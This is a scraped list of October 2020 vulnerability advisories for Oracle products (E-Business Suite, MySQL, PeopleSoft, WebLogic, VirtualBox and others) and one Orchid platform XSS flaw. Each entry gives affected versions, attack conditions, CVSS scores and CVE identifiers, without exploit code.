oracle — installed_base Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: APIs). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N). 2020-10-21 4.3 CVE-2020-14822
MISC
oracle — java_virtual_machine Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows low privileged attacker having Create Procedure privilege with network access via multiple protocols to compromise Java VM. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java VM accessible data. CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N). 2020-10-21 4.9 CVE-2020-14743
MISC
oracle — marketing Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14849
MISC
oracle — marketing Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14835
MISC
oracle — marketing Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14816
MISC
oracle — marketing Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14817
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14844
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14846
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14789
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14786
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14830
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14793
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14809
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14794
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14799
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14804
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14848
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14893
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14829
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14821
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 6.5 CVE-2020-14828
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14814
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 4 CVE-2020-14827
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14888
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 6.8 CVE-2020-14891
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4 CVE-2020-14790
CONFIRM
MISC
oracle — one-to-one_fulfillment Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). The supported version that is affected is 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle One-to-One Fulfillment. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle One-to-One Fulfillment, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle One-to-One Fulfillment accessible data as well as unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14819
MISC
oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Grids). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 5.8 CVE-2020-14813
MISC
oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.3 CVE-2020-14802
MISC
oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.3 CVE-2020-14801
MISC
oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N). 2020-10-21 4.3 CVE-2020-14795
MISC
oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Query). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 5 CVE-2020-14806
MISC
oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Integration Broker). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 5.8 CVE-2020-14832
MISC
oracle — rest_data_services Vulnerability in the Oracle REST Data Services product of Oracle REST Data Services (component: General). Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c; Standalone ORDS: prior to 20.2.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle REST Data Services accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 4 CVE-2020-14744
MISC
oracle — rest_data_services Vulnerability in the Oracle REST Data Services product of Oracle REST Data Services (component: General). Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c; Standalone ORDS: prior to 20.2.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle REST Data Services accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 4 CVE-2020-14745
MISC
oracle — solaris Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystem). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4.9 CVE-2020-14754
MISC
oracle — text Vulnerability in the Oracle Text component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Oracle Net to compromise Oracle Text. Successful attacks of this vulnerability can result in takeover of Oracle Text. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 6.8 CVE-2020-14734
MISC
oracle — trade_management Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14833
MISC
oracle — trade_management Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14808
MISC
oracle — trade_management Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14834
MISC
oracle — trade_management Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14857
MISC
oracle — utilities_framework Vulnerability in the Oracle Utilities Framework product of Oracle Utilities Applications (component: System Wide). Supported versions that are affected are 2.2.0.0.0, 4.2.0.2.0, 4.2.0.3.0, 4.3.0.1.0 – 4.3.0.6.0, 4.4.0.0.0 and 4.4.0.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Utilities Framework. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Utilities Framework accessible data as well as unauthorized read access to a subset of Oracle Utilities Framework accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N). 2020-10-21 5.5 CVE-2020-14895
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). 2020-10-21 4.9 CVE-2020-14889
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). 2020-10-21 4.9 CVE-2020-14886
MISC
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4.9 CVE-2020-14892
MISC
oracle — weblogic_server Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 5 CVE-2020-14820
MISC
oracle — weblogic_server Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). The supported version that is affected is 12.2.1.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 6.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N). 2020-10-21 6.8 CVE-2020-14757
MISC
orchid — platform In platform before version 9.4.4, inline attributes are not properly escaped. If the data that came from users was not escaped, then an XSS vulnerability is possible. The issue was introduced in 9.0.0 and fixed in 9.4.4. 2020-10-19 4.3 CVE-2020-15263
MISC
CONFIRM
